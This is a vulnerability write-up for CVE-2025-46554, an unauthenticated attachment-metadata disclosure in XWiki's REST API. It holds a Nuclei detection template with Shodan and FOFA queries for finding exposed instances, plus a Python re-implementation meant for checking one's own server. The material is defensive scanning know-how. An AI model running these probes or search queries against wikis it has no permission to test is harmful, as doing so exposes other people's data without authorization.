Vulnerability description
A vulnerability in XWiki's REST API allows unauthenticated users to access the attachments list and metadata through the attachments endpoint. This could lead to disclosure of sensitive information stored in attachment metadata. The Nuclei template below detects the issue by requesting the attachments endpoint without credentials and checking the response.
id: CVE-2025-46554

info:
  name: XWiki REST API - Attachments Disclosure
  author: ritikchaddha
  severity: high
  description: |
    A vulnerability in XWiki's REST API allows unauthenticated users to access attachments list and metadata through the attachments endpoint. This could lead to disclosure of sensitive information stored in attachments metadata.
  reference:
    - https://jira.xwiki.org/browse/XWIKI-22424
    - https://nvd.nist.gov/vuln/detail/CVE-2025-46554
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-285
    cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    verified: true
    vendor: xwiki
    product: xwiki
    shodan-query: html:"data-xwiki-reference"
    fofa-query: body="data-xwiki-reference"
  tags: cve,cve2025,xwiki,rest-api,exposure,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/{{path}}"

    payloads:
      path:
        - "rest/wikis/xwiki/spaces/Sandbox/pages/WebHome/attachments"
        - "xwiki/rest/wikis/xwiki/spaces/Sandbox/pages/WebHome/attachments"

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains_any(header, 'text/xml', 'text/javascript')"
          - "contains_all(body, '<attachments', '<item', '<longSize')"
        condition: and
# digest: 4b0a00483046022100c5354f334dab43806bfd583cf05ec5fa53549483baeb8d3091dd2dc6a7ebd874022100ad376377b2c68534b57cc206fa373466daaedd80fde83e027adcded4d87c783d:922c64590222798bb761d5b6d8e72950
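The following is an added example, not code from the Nuclei project or from the template author. It re-implements the template's matcher logic (the three DSL conditions joined with `condition: and`, plus `stop-at-first-match` over the two payload paths) in plain Python, so that an administrator can run the same check against their own XWiki instance before and after patching, and so that the detection rule can be unit-tested offline against captured responses. The hostname `wiki.example.test` and the sample XML body are constructed for illustration and are not taken from any real system; the sample body only contains the markers the template looks for and is not a claim about XWiki's actual response format.

```python
"""Added example: mirror of the CVE-2025-46554 Nuclei matcher, usable as a
self-check for one's own XWiki instance and as an offline test of the rule."""

from dataclasses import dataclass
from typing import Iterable, List, Optional
import urllib.error
import urllib.request

# Paths probed by the template, in the same order. With stop-at-first-match,
# the first path whose response satisfies the matcher ends the check.
ATTACHMENT_PATHS = (
    "rest/wikis/xwiki/spaces/Sandbox/pages/WebHome/attachments",
    "xwiki/rest/wikis/xwiki/spaces/Sandbox/pages/WebHome/attachments",
)

# contains_all(body, ...) markers and contains_any(header, ...) values from the DSL.
REQUIRED_BODY_MARKERS = ("<attachments", "<item", "<longSize")
ACCEPTED_CONTENT_TYPES = ("text/xml", "text/javascript")


@dataclass
class HttpResponse:
    status_code: int
    headers: dict   # header name -> value
    body: str


def header_blob(headers: dict) -> str:
    """Flatten headers into 'Name: value' lines, the form the `header`
    DSL variable is matched against."""
    return "\n".join(f"{name}: {value}" for name, value in headers.items())


def matches_template(resp: HttpResponse) -> bool:
    """All three template conditions must hold (condition: and)."""
    if resp.status_code != 200:
        return False
    hdrs = header_blob(resp.headers)
    if not any(ct in hdrs for ct in ACCEPTED_CONTENT_TYPES):
        return False
    return all(marker in resp.body for marker in REQUIRED_BODY_MARKERS)


def candidate_urls(base_url: str) -> List[str]:
    """Expand {{BaseURL}}/{{path}} for each payload path."""
    base = base_url.rstrip("/")
    return [f"{base}/{p}" for p in ATTACHMENT_PATHS]


def first_match(responses: Iterable[HttpResponse]) -> Optional[int]:
    """stop-at-first-match: index of the first matching response, or None."""
    for index, resp in enumerate(responses):
        if matches_template(resp):
            return index
    return None


def fetch_unauthenticated(url: str, timeout: float = 10.0) -> HttpResponse:
    """GET with no credentials, i.e. as an anonymous user. Error statuses are
    returned as responses rather than raised so the matcher can evaluate them."""
    req = urllib.request.Request(url, headers={"Accept": "application/xml"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as r:
            return HttpResponse(r.status, dict(r.headers.items()),
                                r.read().decode("utf-8", "replace"))
    except urllib.error.HTTPError as e:
        return HttpResponse(e.code, dict(e.headers.items()),
                            e.read().decode("utf-8", "replace"))


def check_own_instance(base_url: str) -> Optional[str]:
    """Self-assessment: the URL that still exposes attachment metadata to
    anonymous users, or None if neither path matches (expected after patching)."""
    urls = candidate_urls(base_url)
    idx = first_match(fetch_unauthenticated(u) for u in urls)
    return urls[idx] if idx is not None else None


# Constructed sample body for offline testing (contains the three markers;
# not a real XWiki response).
SAMPLE_EXPOSED_BODY = (
    "<attachments><item><name>notes.txt</name>"
    "<longSize>1234</longSize></item></attachments>"
)

if __name__ == "__main__":
    # Hypothetical base URL; replace with your own instance when running for real.
    print(check_own_instance("https://wiki.example.test/"))
```

Running `check_own_instance` on a patched or access-controlled instance should return `None`; a non-`None` result means anonymous users can still list attachment metadata and the REST endpoint's permissions need attention.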